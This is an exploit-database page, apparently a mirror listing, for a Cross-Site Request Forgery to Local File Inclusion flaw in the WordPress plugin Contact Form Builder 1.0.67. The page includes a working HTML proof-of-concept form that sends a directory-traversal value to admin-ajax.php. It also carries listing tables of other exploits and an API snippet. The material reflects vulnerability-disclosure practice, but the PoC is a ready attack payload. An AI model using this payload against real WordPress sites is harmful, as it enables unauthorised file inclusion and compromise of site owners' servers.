Search for hundreds of thousands of exploits

"WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery / Local File Inclusion"

Author

Exploit author

"Panagiotis Vagenas"

Platform

Exploit platform

php

Release date

Exploit published date

2019-04-22

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
# Exploit Title: Contact Form Builder [CSRF → LFI]
# Date: 2019-03-17
# Exploit Author: Panagiotis Vagenas
# Vendor Homepage: http://web-dorado.com/
# Software Link: https://wordpress.org/plugins/contact-form-builder
# Version: 1.0.67
# Tested on: WordPress 5.1.1

Description
-----------

Plugin implements the following AJAX actions:

- `ContactFormMakerPreview`
- `ContactFormmakerwdcaptcha`
- `nopriv_ContactFormmakerwdcaptcha`
- `CFMShortcode`

All of them call the function `contact_form_maker_ajax`. This function
dynamicaly loads a file defined in `$_GET['action']` or
`$_POST['action']` if the former is not defined. Because of the way
WordPress defines the AJAX action a user could define the plugin action
in the `$_GET['action']` and AJAX action in `$_POST['action']`.
Leveraging that and the fact that no sanitization is performed on the
`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
file using directory traversal thus leading to Local File Inclusion
vulnerability.

PoC
---

```html
<form method="post"
action="http://wp-csrf-new.test/wp-admin/admin-ajax.php?action=/../../../../../../index">
    <label>AJAX action:
        <select name="action">
                <option
value="ContactFormMakerPreview">ContactFormMakerPreview</option>
                <option
value="ContactFormmakerwdcaptcha">ContactFormmakerwdcaptcha</option>
                <option
value="nopriv_ContactFormmakerwdcaptcha">nopriv_ContactFormmakerwdcaptcha</option>
                <option value="CFMShortcode">CFMShortcode</option>
        </select>
    </label>
    <button type="submit" value="Submit">Submit</button>
</form>
```
Release DateTitleTypePlatformAuthor
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
2020-05-27"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"OXID eShop 6.3.4 - 'sorting' SQL Injection"webappsphpVulnSpy
Release DateTitleTypePlatformAuthor
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"OXID eShop 6.3.4 - 'sorting' SQL Injection"webappsphpVulnSpy
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
2020-05-27"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-26"OpenEMR 5.0.1 - Remote Code Execution"webappsphp"Musyoka Ian"
Release DateTitleTypePlatformAuthor
2019-04-22"WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery / Local File Inclusion"webappsphp"Panagiotis Vagenas"
2018-01-10"WordPress Plugin Admin Menu Tree Page View 2.6.9 - Cross-Site Request Forgery / Privilege Escalation"webappsphp"Panagiotis Vagenas"
2018-01-10"WordPress Plugin WordPress Download Manager 2.9.60 - Cross-Site Request Forgery"webappsphp"Panagiotis Vagenas"
2018-01-10"WordPress Plugin CMS Tree Page View 1.4 - Cross-Site Request Forgery / Privilege Escalation"webappsphp"Panagiotis Vagenas"
2018-01-10"WordPress Plugin Social Media Widget by Acurax 3.2.5 - Cross-Site Request Forgery"webappsphp"Panagiotis Vagenas"
2016-03-03"WordPress Plugin Bulk Delete 5.5.3 - Privilege Escalation"webappsphp"Panagiotis Vagenas"
2016-02-24"WordPress Plugin Extra User Details 0.4.2 - Privilege Escalation"webappsphp"Panagiotis Vagenas"
2016-02-08"WordPress Plugin User Meta Manager 3.4.6 - Information Disclosure"webappsphp"Panagiotis Vagenas"
2016-02-08"WordPress Plugin WooCommerce Store Toolkit 1.5.5 - Privilege Escalation"webappsphp"Panagiotis Vagenas"
2016-02-08"WordPress Plugin WP User Frontend < 2.3.11 - Unrestricted Arbitrary File Upload"webappsphp"Panagiotis Vagenas"
2016-02-04"WordPress Plugin User Meta Manager 3.4.6 - Privilege Escalation"webappsphp"Panagiotis Vagenas"
2016-02-04"WordPress Plugin User Meta Manager 3.4.6 - Blind SQL Injection"webappsphp"Panagiotis Vagenas"
2015-12-03"Gnome Nautilus 3.16 - Denial of Service"doslinux"Panagiotis Vagenas"
2015-12-03"WordPress Plugin Users Ultra 1.5.50 - Persistent Cross-Site Scripting"webappsphp"Panagiotis Vagenas"
2015-12-03"WordPress Plugin Users Ultra 1.5.50 - Blind SQL Injection"webappsphp"Panagiotis Vagenas"
2015-11-18"WordPress Plugin Users Ultra 1.5.50 - Unrestricted Arbitrary File Upload"webappsphp"Panagiotis Vagenas"
2015-06-04"WordPress Plugin zM Ajax Login & Register 1.0.9 - Local File Inclusion"webappsphp"Panagiotis Vagenas"
2015-05-27"WordPress Plugin Free Counter 1.1 - Persistent Cross-Site Scripting"webappsphp"Panagiotis Vagenas"
2015-05-21"WordPress Plugin WP Membership 1.2.3 - Multiple Vulnerabilities"webappsphp"Panagiotis Vagenas"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46734/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.